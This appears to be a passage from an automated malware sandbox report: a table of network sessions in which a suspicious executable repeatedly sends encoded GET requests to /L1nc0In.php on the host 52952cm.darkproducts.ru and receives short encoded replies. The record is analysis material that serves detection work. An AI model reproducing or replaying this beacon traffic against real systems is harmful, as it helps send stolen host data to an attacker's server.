49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49808	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:28.428152084 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:29.188045979 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2B83N%2BBDIqECl8cjM80ddfTeaU3JLeFBNjOzKE7QUxTnQZx5ygDAA2WYUM8eYAo7U6%2BUzWKy%2B%2BdPCKrvaGh6m2poB0zMU211EdxKhu0xZSDhQOtkW2HTvYYZWX1SM2EOs2WlohxdKCrNLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc436a2683bc32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49844	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:34.209156990 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:34.941063881 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KHp6K2BCgEpnv3G5Gn8p7DJrwWhairZFTfOAPmE%2Fs4M8lnttaKCjuEW6iVo%2By83sl1to4ThT8ONH6ksHZGnv2qPglLvt1N69tlKTBhdRS2%2BsvoofVTkUogHEsZ%2BM%2FvMwYbZpbg1PUDqnQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc436c66aff42bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1939&rtt_var=969&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49885	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:39.958923101 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:40.670352936 CET	946	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWWnSazsGCnxdHd5l7Y%2BQc6McVTMFu%2B%2FlGnIiorJ6BtsL%2F5%2FBQSvMzVneTTvXRRJ9iSAKKPQ2dNJzzLbyBPvhlos6OqFmCiXKJgC5asP7%2BxRipbjdexbJX37yZzNyhBienRywC%2B2DIuO%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc436ea380017a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49920	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:45.677755117 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:46.408647060 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOJ65TUn87QdU6%2Fc6FOPcjiFkR2MGV%2Fu3%2FHcqUpIAPLRM9td4RSqCvTGiFeJ4cQI5YyO94xMMxF7sG8dVMqTpHXVRc0%2BKJnwQ%2FN7Y2ChWpXNaEYghkHA6kC3z4kxzQNifStHUADtnJPdxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4370e1ed90f63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49958	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:51.429416895 CET	2237	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:52.138631105 CET	940	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbmzFvmMj5asCjMXWeiuSR1HAA02IvLFCLhqDSB1XCmdRKSLfQQ%2Bmzb5OQY5GfLpuAlT2r%2BAoPg%2FXSO46bXwXFoTCfWxZGze%2BL4kD7fC%2BNYAEZgU5Y39bXw%2FIxMClXoYaE6UUeV1BXCKTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43731fe1e32f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1976&rtt_var=988&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2237&delivery_rate=0&cwnd=110&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49984	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:57.148303032 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:57.844818115 CET	928	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APvFepIOISr411egb09Nk4e3BGZPssbdCpsz4USJLSV0sO8Lt9zR1wMT3LqIdMmkzA0CBuZkOeqXOYidmld3137ppe7KS0DJU6jWr50paUGbC3V6oXjb54iKKXAvuTqm6necetBvwbzQNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43755b8494240-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49987	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:02.865580082 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
